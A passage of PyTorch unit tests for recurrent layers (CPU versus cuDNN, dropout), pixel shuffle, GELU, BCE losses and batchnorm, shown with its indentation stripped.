self.assertEqual(output1, output2)
self.assertEqual(hidden1, hidden2)
def test_projections_errors_on_gru_and_rnn(self):
error_msg = "proj_size argument is only supported for LSTM, not RNN or GRU"
for mode in ['RNN', 'GRU']:
with self.assertRaisesRegex(ValueError, error_msg):
rnn = getattr(nn, mode)(30, 20, 2, proj_size=10)
def _test_RNN_cpu_vs_cudnn(self, dropout, dtype=torch.double):
def forward_backward(cuda, rnn, input_val, grad_output, weights_val, hx_val, grad_hy,
cx_val=None, grad_cy=None):
is_lstm = isinstance(rnn, nn.LSTM)
for x_layer, y_layer in zip(rnn.all_weights, weights_val):
for x, y in zip(x_layer, y_layer):
x.data.copy_(y.data)
if isinstance(input_val, rnn_utils.PackedSequence):
input = rnn_utils.PackedSequence(
input_val.data.data.requires_grad_(True), input_val.batch_sizes)
input_var = input.data
else:
input = input_val.clone().requires_grad_(True)
input_var = input
if is_lstm:
if cx_val is None:
hx = (hx_val.clone().requires_grad_(True),
hx_val.add(1).requires_grad_(True))
else:
hx = (hx_val.clone().requires_grad_(True),
cx_val.add(1).requires_grad_(True))
else:
hx = hx_val.clone().requires_grad_(True)
if cuda:
rnn.cuda()
input_var.data = input_var.data.cuda()
if is_lstm:
hx[0].data = hx[0].data.cuda()
hx[1].data = hx[1].data.cuda()
else:
hx.data = hx.data.cuda()
grad_hy = grad_hy.cuda()
if grad_cy is not None:
grad_cy = grad_cy.cuda()
grad_output = grad_output.cuda()
output, hy = rnn(input, hx)
if isinstance(output, rnn_utils.PackedSequence):
output = output.data
if is_lstm:
if grad_cy is None:
torch.autograd.backward([output, hy[0], hy[1]], [grad_output, grad_hy, grad_hy + 1])
else:
torch.autograd.backward([output, hy[0], hy[1]], [grad_output, grad_hy, grad_cy + 1])
else:
torch.autograd.backward([output, hy], [grad_output, grad_hy])
return {'output': output.data,
'hy': hy[0].data if is_lstm else hy.data,
'weights': rnn.all_weights,
'grad_input': input_var.grad.data,
'grad_hx': hx[0].grad.data if is_lstm else hx.grad.data,
'cy': hy[1].data if is_lstm else None,
'grad_cx': hx[1].grad.data if is_lstm else None}
input_size = 10
hidden_size = 6
proj_size = 3
num_layers = 2
seq_length = 7
batch = 6
def make_noncontig(tensor):
ndim = tensor.dim()
return torch.stack([tensor.clone().zero_(), tensor], ndim).select(ndim, 1)
def compare_cpu_gpu(outputs_cpu, outputs_gpu):
self.assertEqual(list(outputs_cpu.keys()), list(outputs_gpu.keys()))
for key in outputs_cpu.keys():
if key != 'weights':
self.assertEqual(outputs_cpu[key], outputs_gpu[key], atol=5e-5, rtol=0, msg=key)
# check grad weights separately, as nested dict
for cpu_layer_weight, gpu_layer_weight in zip(outputs_cpu['weights'], outputs_gpu['weights']):
for (cpu_weight, gpu_weight) in zip(cpu_layer_weight, gpu_layer_weight):
self.assertEqual(cpu_weight.grad.data, gpu_weight.grad.data, atol=5e-5, rtol=0)
for module in (nn.RNN, nn.LSTM, nn.GRU):
for bias, bidirectional, batch_first, contig, variable_len, lens_as_tensor \
in product((True, False), repeat=6):
num_directions = 2 if bidirectional else 1
if batch_first:
input_val = torch.randn(batch, seq_length, input_size, dtype=dtype)
grad_output = torch.randn(batch, seq_length, hidden_size * num_directions, dtype=dtype)
else:
input_val = torch.randn(seq_length, batch, input_size, dtype=dtype)
grad_output = torch.randn(seq_length, batch, hidden_size * num_directions, dtype=dtype)
hx_val = torch.randn(num_layers * num_directions, batch, hidden_size, dtype=dtype)
grad_hy = torch.randn(num_layers * num_directions, batch, hidden_size, dtype=dtype)
if not contig:
grad_output = make_noncontig(grad_output)
grad_hy = make_noncontig(grad_hy)
input_var = make_noncontig(input_val)
hx_val = make_noncontig(hx_val)
if variable_len:
lengths = [7, 5, 5, 2, 1, 1]
if lens_as_tensor:
lengths = torch.tensor(lengths, dtype=torch.long)
input_val = rnn_utils.pack_padded_sequence(input_val, lengths, batch_first=batch_first)
grad_output = rnn_utils.pack_padded_sequence(grad_output, lengths, batch_first=batch_first).data
rnn = module(input_size,
hidden_size,
num_layers,
bias=bias,
dropout=dropout,
bidirectional=bidirectional,
batch_first=batch_first).to(dtype)
outputs_cpu = forward_backward(
False, rnn, input_val, grad_output, rnn.all_weights, hx_val, grad_hy)
rnn_gpu = module(input_size,
hidden_size,
num_layers,
bias=bias,
dropout=dropout,
bidirectional=bidirectional,
batch_first=batch_first).to(dtype)
outputs_gpu = forward_backward(
True, rnn_gpu, input_val, grad_output, rnn.all_weights, hx_val, grad_hy)
compare_cpu_gpu(outputs_cpu, outputs_gpu)
for nonlinearity in ('tanh', 'relu'):
hx_val = torch.randn(num_layers, batch, hidden_size, dtype=dtype)
input_val = torch.randn(seq_length, batch, input_size, dtype=dtype)
grad_output = torch.randn(
seq_length, batch, hidden_size * num_directions, dtype=dtype)
grad_hy = torch.randn(
num_layers * num_directions, batch, hidden_size, dtype=dtype)
rnn = nn.RNN(input_size, hidden_size, num_layers, bias=bias, nonlinearity=nonlinearity).to(dtype)
outputs_cpu = forward_backward(False, rnn, input_val, grad_output, rnn.all_weights, hx_val, grad_hy)
rnn_gpu = nn.RNN(input_size, hidden_size, num_layers, bias=bias, nonlinearity=nonlinearity).to(dtype)
outputs_gpu = forward_backward(True, rnn_gpu, input_val, grad_output, rnn.all_weights, hx_val, grad_hy)
compare_cpu_gpu(outputs_cpu, outputs_gpu)
# checking LSTM with projections
for bias, bidirectional, batch_first, contig, variable_len, lens_as_tensor \
in product((True, False), repeat=6):
num_directions = 2 if bidirectional else 1
if batch_first:
input_val = torch.randn(batch, seq_length, input_size, dtype=dtype)
grad_output = torch.randn(batch, seq_length, proj_size * num_directions, dtype=dtype)
else:
input_val = torch.randn(seq_length, batch, input_size, dtype=dtype)
grad_output = torch.randn(seq_length, batch, proj_size * num_directions, dtype=dtype)
hx_val = torch.randn(num_layers * num_directions, batch, proj_size, dtype=dtype)
cx_val = torch.randn(num_layers * num_directions, batch, hidden_size, dtype=dtype)
grad_hy = torch.randn(num_layers * num_directions, batch, proj_size, dtype=dtype)
grad_cy = torch.randn(num_layers * num_directions, batch, hidden_size, dtype=dtype)
if not contig:
grad_output = make_noncontig(grad_output)
grad_hy = make_noncontig(grad_hy)
grad_cy = make_noncontig(grad_cy)
input_var = make_noncontig(input_val)
hx_val = make_noncontig(hx_val)
cx_val = make_noncontig(cx_val)
if variable_len:
lengths = [7, 5, 5, 2, 1, 1]
if lens_as_tensor:
lengths = torch.tensor(lengths, dtype=torch.long)
input_val = rnn_utils.pack_padded_sequence(input_val, lengths, batch_first=batch_first)
grad_output = rnn_utils.pack_padded_sequence(grad_output, lengths, batch_first=batch_first).data
rnn = nn.LSTM(input_size,
hidden_size,
num_layers,
bias=bias,
dropout=dropout,
bidirectional=bidirectional,
batch_first=batch_first,
proj_size=proj_size).to(dtype)
outputs_cpu = forward_backward(
False, rnn, input_val, grad_output, rnn.all_weights,
hx_val, grad_hy, cx_val, grad_cy)
rnn_gpu = nn.LSTM(input_size,
hidden_size,
num_layers,
bias=bias,
dropout=dropout,
bidirectional=bidirectional,
batch_first=batch_first,
proj_size=proj_size).to(dtype)
outputs_gpu = forward_backward(
True, rnn_gpu, input_val, grad_output, rnn.all_weights,
hx_val, grad_hy, cx_val, grad_cy)
compare_cpu_gpu(outputs_cpu, outputs_gpu)
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
def test_RNN_cpu_vs_cudnn_no_dropout(self):
dtype = torch.double
self._test_RNN_cpu_vs_cudnn(0, dtype)
@unittest.skipIf(not (TEST_CUDNN and (TEST_CUDNN_VERSION if TEST_CUDNN_VERSION else 0) >= 5103), "needs cudnn >= 5.1")
def test_RNN_cpu_vs_cudnn_with_dropout(self):
# Because of dropout randomness, can only compare dropout=0 and dropout=1
self._test_RNN_cpu_vs_cudnn(1)
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
def test_RNN_cudnn_weight_norm(self):
input_size = 10
hidden_size = 6
num_layers = 2
seq_length = 7
batch = 6
# runs on CPU to acquire expected output
def check_weight_norm(m, name):
input = torch.randn(seq_length, batch, input_size)
expected_output = m(input)
# adds weight normalization
m = torch.nn.utils.weight_norm(m, name=name)
# moves to CUDA
m = m.cuda()
input = input.cuda()
# otherwise, subsequent warnings will be hidden, and further tests rely on them
warnings.simplefilter("always")
self.assertEqual(m(input), expected_output)
# remove weight norm
m = torch.nn.utils.remove_weight_norm(m, name=name)
self.assertEqual(m(input), expected_output)
check_weight_norm(nn.LSTM(input_size, hidden_size, num_layers), 'weight_hh_l0')
check_weight_norm(nn.LSTM(input_size, hidden_size, num_layers, proj_size=3), 'weight_hr_l0')
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_partial_flat_weights(self):
input_size = 10
hidden_size = 6
num_layers = 2
m = nn.LSTM(input_size, hidden_size, num_layers)
inp = torch.randn(3, 2, 10)
out_expected = m(inp)
# deletes an attribute of original LSTM
weight_orig = m.weight_hh_l0
del m.weight_hh_l0
self.assertFalse(hasattr(m, "weight_hh_l0"))
# verifies that moving to CUDA with only some attributes defined
# does not throw an error
m.cuda()
# recompute the weight and make sure that module can be used
m.weight_hh_l0 = weight_orig.cuda()
inp = inp.cuda()
# otherwise, subsequent warnings will be hidden, and further tests rely on them
warnings.simplefilter("always")
self.assertEqual(m(inp)[0].cpu(), out_expected[0])
@unittest.skipIf(not (TEST_CUDNN and (TEST_CUDNN_VERSION if TEST_CUDNN_VERSION else 0) >= 5103), "needs cudnn >= 5.1")
def test_RNN_dropout(self):
# checking the assumption that cuDNN sticks dropout in between
# RNN layers
for p in (0, 0.276, 0.731, 1):
for train in (True, False):
for cuda in (True, False):
rnn = nn.RNN(10, 1000, 2, bias=False, dropout=p, nonlinearity='relu')
if cuda:
rnn.cuda()
if train:
rnn.train()
else:
rnn.eval()
rnn.weight_ih_l0.data.fill_(1)
rnn.weight_hh_l0.data.fill_(1)
rnn.weight_ih_l1.data.fill_(1)
rnn.weight_hh_l1.data.fill_(1)
input = torch.ones(1, 1, 10)
hx = torch.zeros(2, 1, 1000)
if cuda:
input = input.cuda()
hx = hx.cuda()
output, hy = rnn(input, hx)
self.assertEqual(output.data.min(), output.data.max())
output_val = output.data[0][0][0]
if p == 0 or not train:
self.assertEqual(output_val, 10000)
elif p == 1:
self.assertEqual(output_val, 0)
else:
self.assertGreater(output_val, 8000)
self.assertLess(output_val, 12000)
denorm_mod = (output_val * (1 - p)) % 10
self.assertLess(min(denorm_mod, 10 - denorm_mod), 1e-2)
self.assertEqual(hy[0].data.min(), hy[0].data.max())
self.assertEqual(hy[1].data.min(), hy[1].data.max())
self.assertEqual(hy.data[0][0][0], 10)
self.assertEqual(hy.data[1][0][0], output_val)
def test_error_RNN_seq_len_zero(self):
# checking error message when RNN has seq_len = 0
for module in (nn.RNN, nn.LSTM, nn.GRU):
for bidirectional in [True, False]:
for device in torch.testing.get_all_device_types():
input = torch.ones(0, 10, 5)
rnn = module(5, 6, bidirectional=bidirectional)
if device == 'cuda':
rnn.cuda()
input = input.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected sequence length to be larger than 0 in RNN"):
rnn(input)
@unittest.skipIf(not (TEST_CUDNN and (TEST_CUDNN_VERSION if TEST_CUDNN_VERSION else 0) >= 5103), "needs cudnn >= 5.1")
def test_RNN_dropout_state(self):
for p in (0, 0.1234):
for train in (True, False):
for cuda in (True, False):
rnn = nn.RNN(100, 100, 2, bias=False, dropout=p, nonlinearity='relu')
if cuda:
rnn.cuda()
if train:
rnn.train()
else:
rnn.eval()
input = torch.rand(1, 1, 100)
hx = torch.rand(2, 1, 100)
if cuda:
input = input.cuda()
hx = hx.cuda()
output1, hy1 = rnn(input, hx)
output2, hy2 = rnn(input, hx)
buf = io.BytesIO()
rnn_pickle = torch.save(rnn, buf)
buf.seek(0)
rnn2 = torch.load(buf)
rnn2.flatten_parameters()
output3, hy3 = rnn2(input, hx)
if p == 0 or not train:
self.assertEqual(output1, output2)
self.assertEqual(output1, output3)
self.assertEqual(hy1, hy2)
self.assertEqual(hy1, hy3)
else:
self.assertNotEqual(output1, output2)
self.assertNotEqual(output1, output3)
self.assertNotEqual(hy1, hy2)
self.assertNotEqual(hy1, hy3)
@unittest.skipIf(not (TEST_CUDNN and (TEST_CUDNN_VERSION if TEST_CUDNN_VERSION else 0) >= 5103), "needs cudnn >= 5.1")
def test_RNN_change_dropout(self):
for train, cuda in product((True, False), repeat=2):
rnn = nn.RNN(100, 100, 2, dropout=0, nonlinearity='relu')
input = torch.rand(3, 2, 100)
if cuda:
input.data = input.data.cuda()
rnn.cuda()
if train:
rnn.train()
else:
rnn.eval()
prev_output = None
for p in (0, 0.5, 0, 0.7, 0.2, 1, 0.2, 0):
rnn.dropout = p
output1, hy1 = rnn(input)
output2, hy2 = rnn(input)
if p == 0 or p == 1 or not train:
self.assertEqual(output1, output2)
self.assertEqual(hy1, hy2)
else:
self.assertNotEqual(output1, output2)
self.assertNotEqual(hy1, hy2)
if prev_output is not None:
if not train:
self.assertEqual(output1.data, prev_output)
self.assertEqual(output2.data, prev_output)
else:
self.assertNotEqual(output1.data, prev_output)
self.assertNotEqual(output2.data, prev_output)
prev_output = output1.data
def test_inplace_thnn(self):
modules = [nn.ReLU, nn.ELU, nn.SELU, nn.CELU, nn.RReLU]
for mod in modules:
r = mod(inplace=True)
input = torch.randn(5, 5, requires_grad=True)
output = r(input + 0)
grad_output = torch.randn(5, 5)
grad_output_clone = grad_output.clone()
output.backward(grad_output)
self.assertEqual(grad_output, grad_output_clone)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types(get_all_fp_dtypes(include_bfloat16=AMPERE_OR_ROCM))
def test_noncontig_conv_grad_cuda(self, dtype=torch.float):
# FIXME: remove after adding non-contiguous grad tests for all modules
module = nn.Conv2d(3, 5, kernel_size=3, padding=1).to("cuda", dtype)
input = torch.randn(2, 3, 10, 10, dtype=dtype, device="cuda", requires_grad=True)
output = module(input)
grad = torch.randn(2, 2, 5, 10, 10, dtype=dtype, device="cuda")[:, 1]
assert not grad.is_contiguous()
output.backward(grad, retain_graph=True)
self.assertIsNotNone(input.grad)
result = input.grad.data.clone()
input.grad.data.zero_()
output.backward(grad.contiguous())
self.assertEqual(result, input.grad.data, atol=dtype2prec_DONTUSE[dtype], rtol=0)
def test_pixel_shuffle_unshuffle(self):
def _test_pixel_shuffle_unshuffle_helper(num_input_dims, valid_channels_dim=True,
upscale_factor=None):
# Function to imperatively ensure pixels are shuffled to the correct locations.
# Used to validate the batch operations in pixel_shuffle.
def _verify_pixel_shuffle(input, output, upscale_factor):
for c in range(output.size(-3)):
for h in range(output.size(-2)):
for w in range(output.size(-1)):
height_idx = h // upscale_factor
weight_idx = w // upscale_factor
channel_idx = (upscale_factor * (h % upscale_factor)) + (w % upscale_factor) + \
(c * upscale_factor ** 2)
self.assertEqual(output[..., c, h, w], input[..., channel_idx, height_idx, weight_idx])
upscale_factor = random.randint(2, 5) if upscale_factor is None else upscale_factor
# If valid_channels_dim=False, add 1 to make channels dim indivisible by upscale_factor ** 2.
channels = random.randint(1, 4) * upscale_factor ** 2 + (0 if valid_channels_dim else 1)
height = random.randint(5, 10)
width = random.randint(5, 10)
if num_input_dims == 1:
input = torch.rand(channels, requires_grad=True)
elif num_input_dims == 2:
input = torch.rand(height, width, requires_grad=True)
else:
batch_sizes = [random.randint(1, 3) for _ in range(num_input_dims - 3)]
input = torch.rand(*batch_sizes, channels, height, width, requires_grad=True)
ps = nn.PixelShuffle(upscale_factor)
pus = nn.PixelUnshuffle(downscale_factor=upscale_factor)
if num_input_dims >= 3 and valid_channels_dim and upscale_factor > 0:
output = ps(input)
_verify_pixel_shuffle(input, output, upscale_factor)
output.backward(output.data)
self.assertEqual(input.data, input.grad.data)
# Ensure unshuffle properly inverts shuffle.
unshuffle_output = pus(output)
self.assertEqual(input, unshuffle_output)
else:
self.assertRaises(RuntimeError, lambda: ps(input))
def _test_pixel_unshuffle_error_case_helper(num_input_dims, valid_height_dim=True, valid_width_dim=True,
downscale_factor=None):
downscale_factor = random.randint(2, 5) if downscale_factor is None else downscale_factor
channels = random.randint(1, 4)
# If valid_height_dim=False, add 1 to make height dim indivisible by downscale_factor.
height = random.randint(3, 5) * abs(downscale_factor) + (0 if valid_height_dim else 1)
# If valid_width_dim=False, add 1 to make width dim indivisible by downscale_factor.
width = random.randint(3, 5) * abs(downscale_factor) + (0 if valid_width_dim else 1)
if num_input_dims == 1:
input = torch.rand(channels, requires_grad=True)
elif num_input_dims == 2:
input = torch.rand(height, width, requires_grad=True)
else:
batch_sizes = [random.randint(1, 3) for _ in range(num_input_dims - 3)]
input = torch.rand(*batch_sizes, channels, height, width, requires_grad=True)
pus = nn.PixelUnshuffle(downscale_factor)
self.assertRaises(RuntimeError, lambda: pus(input))
def _test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims):
# For 1D - 2D, this is an error case.
# For 3D - 5D, this is a success case for pixel_shuffle + pixel_unshuffle.
_test_pixel_shuffle_unshuffle_helper(num_input_dims=num_input_dims)
# Error cases for pixel_shuffle.
_test_pixel_shuffle_unshuffle_helper(num_input_dims=num_input_dims, valid_channels_dim=False)
_test_pixel_shuffle_unshuffle_helper(num_input_dims=num_input_dims, upscale_factor=0)
_test_pixel_shuffle_unshuffle_helper(num_input_dims=num_input_dims, upscale_factor=-2)
# Error cases for pixel_unshuffle.
_test_pixel_unshuffle_error_case_helper(num_input_dims=num_input_dims, valid_height_dim=False)
_test_pixel_unshuffle_error_case_helper(num_input_dims=num_input_dims, valid_width_dim=False)
_test_pixel_unshuffle_error_case_helper(num_input_dims=num_input_dims, downscale_factor=0)
_test_pixel_unshuffle_error_case_helper(num_input_dims=num_input_dims, downscale_factor=-2)
def test_pixel_shuffle_unshuffle_1D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=1)
def test_pixel_shuffle_unshuffle_2D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=2)
def test_pixel_shuffle_unshuffle_3D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=3)
def test_pixel_shuffle_unshuffle_4D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=4)
def test_pixel_shuffle_unshuffle_5D():
_test_pixel_shuffle_unshuffle_for_input_dims(num_input_dims=5)
test_pixel_shuffle_unshuffle_1D()
test_pixel_shuffle_unshuffle_2D()
test_pixel_shuffle_unshuffle_3D()
test_pixel_shuffle_unshuffle_4D()
test_pixel_shuffle_unshuffle_5D()
def test_elu_inplace_on_view(self):
v = torch.tensor([1.0, -1.0, 1.0, -1.0], requires_grad=True)
def func(root):
x = root.clone()
view = x.narrow(0, 1, 2)
res = F.elu(view, inplace=True)
self.assertIs(res, view)
return x
gradcheck(func, [v])
gradgradcheck(func, [v])
def test_relu_inplace_on_view(self):
v = torch.tensor([1.0, -1.0, 1.0, -1.0], requires_grad=True)
def func(root):
x = root.clone()
view = x.narrow(0, 1, 2)
res = F.relu(view, inplace=True)
self.assertIs(res, view)
return x
gradcheck(func, [v])
gradgradcheck(func, [v])
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_PReLU_backward_requires_grad_false(self):
m = nn.PReLU().to('cuda')
x = torch.randn(2, 3, 4, 5, requires_grad=False, device='cuda')
y = m(x)
y.mean().backward()
self.assertEqual(x.grad, None)
@unittest.skipIf(
not TEST_NUMPY or not TEST_SCIPY, "Numpy or Scipy not found")
def test_gelu(self):
def _test_gelu(n, m, dtype, contiguous, atol=None, rtol=None):
numpy_dtype = {
torch.bfloat16: torch.float, torch.float: torch.float, torch.double: torch.double
}[dtype]
devices = ['cpu']
devices += ['cuda'] if TEST_CUDA else []
def _gelu_ref(X):
return X * stats.norm.cdf(X)
for d in devices:
if contiguous:
X = torch.rand(n, m, dtype=dtype, requires_grad=True, device=d)
else:
X = torch.rand(n, m, dtype=dtype, requires_grad=True, device=d)[:, ::2]
res = F.gelu(X)
ref = _gelu_ref(X.to(numpy_dtype).cpu().detach().numpy())
self.assertEqual(res, ref, rtol=rtol, atol=atol, exact_dtype=False)
if dtype == torch.float64:
gradcheck(F.gelu, [X], eps=1e-4)
for n in range(1, 10):
for m in range(1, 10):
_test_gelu(n, m, torch.bfloat16, True, 1e-2, 0)
_test_gelu(n, m, torch.bfloat16, False, 1e-2, 0)
_test_gelu(n, m, torch.float32, True)
_test_gelu(n, m, torch.float32, False)
_test_gelu(n, m, torch.float64, True)
_test_gelu(n, m, torch.float64, False)
# Test multi threaded
num_threads = torch.get_num_threads()
torch.set_num_threads(4)
try:
_test_gelu(32, 32, torch.float32, False)
finally:
torch.set_num_threads(num_threads)
def test_bce_loss_always_nonnegative(self):
target = torch.ones(5)
input = torch.ones(5)
self.assertEqual((nn.BCELoss()(input, target) < 0).sum(), 0)
target = torch.zeros(5)
input = torch.zeros(5)
self.assertEqual((nn.BCELoss()(input, target) < 0).sum(), 0)
def test_bce_with_logits_raises_if_target_and_input_are_different_size(self):
target = torch.rand(5)
input = torch.rand(5, 1)
with self.assertRaises(ValueError):
nn.BCEWithLogitsLoss()(input, target)
target = torch.rand(5, 1)
input = torch.rand(5)
with self.assertRaises(ValueError):
nn.BCEWithLogitsLoss()(input, target)
def test_bce_with_logits_gives_same_result_as_sigmoid_and_bce_loss(self):
sigmoid = nn.Sigmoid()
target = torch.rand(64, 4)
output = torch.rand(64, 4) - 0.5
self.assertEqual(nn.BCEWithLogitsLoss()(output, target), nn.BCELoss()(sigmoid(output), target))
weight = torch.rand(4)
self.assertEqual(nn.BCEWithLogitsLoss(weight)(output, target), nn.BCELoss(weight)(sigmoid(output), target))
target = torch.zeros(4, 1, dtype=torch.float)
output = torch.empty(4, 1, dtype=torch.float).fill_(-100)
self.assertEqual(nn.BCEWithLogitsLoss()(output, target), nn.BCELoss()(sigmoid(output), target))
self.assertEqual(nn.BCEWithLogitsLoss(reduction='none')(output, target),
nn.BCELoss(reduction='none')(sigmoid(output), target))
weight = torch.rand(1, dtype=torch.float)
self.assertEqual(nn.BCEWithLogitsLoss(weight)(output, target), nn.BCELoss(weight)(sigmoid(output), target))
def test_bce_loss_input_range(self):
bceloss = nn.BCELoss()
target = torch.rand(25, 25)
output_valid = torch.rand(25, 25)
output_too_negative = output_valid - 1.0
output_too_positive = output_valid + 1.0
loss_valid = bceloss(output_valid, target)
with self.assertRaisesRegex(RuntimeError, 'between 0 and 1'):
loss_too_negative = bceloss(output_too_negative, target)
with self.assertRaisesRegex(RuntimeError, 'between 0 and 1'):
loss_too_positive = bceloss(output_too_positive, target)
def test_bce_loss_size_mismatch(self):
bceloss = nn.BCELoss()
a = torch.rand(25)
b = torch.rand(25, 1)
with self.assertRaisesRegex(ValueError, r'Using a target size \('):
bceloss(a, b)
def test_bce_with_logits_gives_same_result_as_sigmoid_and_bce_loss_large_tensors_with_grad(self):
x_size = 1024
y_size = 256
target = torch.rand(x_size, y_size)
for reduction in ['none', 'mean', 'sum']:
output_sig = torch.rand(x_size, y_size) - 0.5
output_logits = output_sig.clone().detach()
output_sig.requires_grad = True
output_logits.requires_grad = True
weight = torch.rand(y_size)
loss_sig = nn.BCELoss(weight, reduction=reduction)(
torch.sigmoid(output_sig), target
)
loss_logits = nn.BCEWithLogitsLoss(weight, reduction=reduction)(
output_logits, target
)
self.assertEqual(loss_logits, loss_sig)
if reduction == 'none':
grad = torch.rand(x_size, y_size)
loss_sig.backward(grad)
loss_logits.backward(grad)
else:
loss_sig.backward()
loss_logits.backward()
self.assertEqual(output_sig.grad, output_logits.grad)
def test_bce_with_logits_has_correct_grad_at_zero(self):
output = torch.zeros(3, 1, requires_grad=True)
target = torch.zeros(3, 1)
nn.BCEWithLogitsLoss(reduction='sum')(output, target).backward()
expected_grad = torch.empty(3, 1).fill_(0.5)
self.assertEqual(output.grad, expected_grad)
def test_bce_with_logits_broadcasts_weights(self):
target = torch.rand(16, 4)
output = torch.rand(16, 4) - 0.5
weight = torch.rand(4)
out1 = nn.BCEWithLogitsLoss(weight)(output, target)
weight = weight.expand(16, 4).contiguous()
out2 = nn.BCEWithLogitsLoss(weight)(output, target)
self.assertEqual(out1, out2)
weight = torch.rand(16, 1)
out1 = nn.BCEWithLogitsLoss(weight)(output, target)
weight = weight.expand(16, 4).contiguous()
out2 = nn.BCEWithLogitsLoss(weight)(output, target)
self.assertEqual(out1, out2)
def test_bce_with_logits_ones_in_pos_weights_are_the_same_as_none(self):
target = torch.rand(64, 4)
output = torch.rand(64, 4) - 0.5
pos_weight = torch.ones(64, 4)
self.assertEqual(nn.BCEWithLogitsLoss()(output, target),
nn.BCEWithLogitsLoss(pos_weight=pos_weight)(output, target))
def test_bce_with_logits_broadcasts_pos_weights(self):
target = torch.rand(64, 4)
output = torch.rand(64, 4) - 0.5
pos_weight = torch.rand(4)
out1 = nn.BCEWithLogitsLoss(pos_weight=pos_weight)(output, target)
pos_weight1 = pos_weight.expand(1, 4)
out2 = nn.BCEWithLogitsLoss(pos_weight=pos_weight1)(output, target)
pos_weight2 = pos_weight.expand(64, 4)
out3 = nn.BCEWithLogitsLoss(pos_weight=pos_weight2)(output, target)
self.assertEqual(out1, out2)
self.assertEqual(out1, out3)
def test_bce_with_logits_with_pos_weight_has_correct_grad_at_zero(self):
output = torch.zeros(3, 1, requires_grad=True)
target = torch.zeros(3, 1)
pos_weight = torch.ones(3, 1)
nn.BCEWithLogitsLoss(pos_weight=pos_weight, reduction='sum')(output, target).backward()
expected_grad = torch.empty(3, 1).fill_(0.5)
grad = output.grad
self.assertEqual(grad, expected_grad)
def test_bce_with_logits_stability(self):
output = torch.tensor([0., -120.])
target = torch.tensor([0., 1.])
pos_weight = torch.tensor([1., 1.])
out1 = nn.BCEWithLogitsLoss()(output, target)
self.assertTrue(torch.isfinite(out1).all().item())
out2 = nn.BCEWithLogitsLoss(pos_weight=pos_weight)(output, target)
self.assertTrue(torch.isfinite(out2).all().item())
def test_bce_loss_broadcasts_weights(self):
sigmoid = nn.Sigmoid()
target = torch.rand(16, 4)
output = torch.rand(16, 4) - 0.5
weight = torch.rand(4)
out1 = nn.BCELoss(weight)(sigmoid(output), target)
weight = weight.expand(16, 4).contiguous()
out2 = nn.BCELoss(weight)(sigmoid(output), target)
self.assertEqual(out1, out2)
weight = torch.rand(16, 1)
out1 = nn.BCELoss(weight)(sigmoid(output), target)
weight = weight.expand(16, 4).contiguous()
out2 = nn.BCELoss(weight)(sigmoid(output), target)
self.assertEqual(out1, out2)
def test_elu_inplace_gradgrad(self):
v = torch.randn(8, requires_grad=True)
def func(root):
x = root.clone()
return F.elu(x, inplace=True)
gradcheck(func, [v])
gradgradcheck(func, [v])
def test_hardtanh_inplace_gradgrad(self):
v = torch.randn(8, requires_grad=True)
def func(root):
x = root.clone()
return F.hardtanh(x, inplace=True)
gradcheck(func, [v])
gradgradcheck(func, [v])
# test hardtanh backward froo large tensor
def test_hardtanh_backward(self):
x = torch.randn(128, 10000, requires_grad=True)
grad = torch.randn(128, 10000)
z = torch.zeros(128, 10000)
y = F.hardtanh(x)
y.backward(grad)
# ref backward path for hardtanh
mask = (x > -1) & (x < 1)
x_grad_ref = torch.where(mask, grad, z)
self.assertEqual(x.grad, x_grad_ref)
def test_batchnorm_nhwc_cpu(self):
def helper(self, size):
channels = size[1]
input = torch.randn(size, dtype=torch.float32, device='cpu', requires_grad=True)
input = input.contiguous(memory_format=torch.channels_last)
input.retain_grad()
grad = torch.randn(size, dtype=torch.float32, device='cpu')
grad = grad.contiguous(memory_format=torch.channels_last)
bn = nn.BatchNorm2d(channels).cpu().float()
bn.weight.data.uniform_()
bn.bias.data.uniform_()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_bn = nn.BatchNorm2d(channels).cpu().float()
ref_bn.load_state_dict(bn.state_dict())
out = bn(input)
out.backward(grad)
ref_out = ref_bn(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(bn.weight.grad, ref_bn.weight.grad)
self.assertEqual(bn.bias.grad, ref_bn.bias.grad)
self.assertEqual(input.grad, ref_input.grad)
helper(self, (4, 8, 10, 10))
helper(self, (4, 1, 9, 9))
helper(self, (4, 9, 1, 1))
def test_batchnorm_non_contig_cpu(self):
input = torch.arange(6, dtype=torch.float).reshape(1, 3, 2, 1).cpu()
input = input.permute(0, 2, 1, 3)
bn = torch.nn.BatchNorm2d(2).cpu().float().eval()
bn.weight.data.uniform_()
bn.bias.data.uniform_()
ref_input = input.detach().clone().contiguous()
ref_bn = nn.BatchNorm2d(2).cpu().float().eval()
ref_bn.load_state_dict(bn.state_dict())
out = bn(input)
ref_out = ref_bn(ref_input)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
@skipIfRocm
def test_batchnorm_cudnn_nhwc(self):
def run_test(input, grad_output):
c = input.size(1)
mod = nn.BatchNorm2d(c).cuda().float()
mod.weight.data.uniform_()
mod.bias.data.uniform_()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_mod = nn.BatchNorm2d(c).cuda().float()
ref_mod.load_state_dict(mod.state_dict())
out = mod(input)
out.backward(grad_output)
ref_out = ref_mod(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(mod.weight.grad, ref_mod.weight.grad)
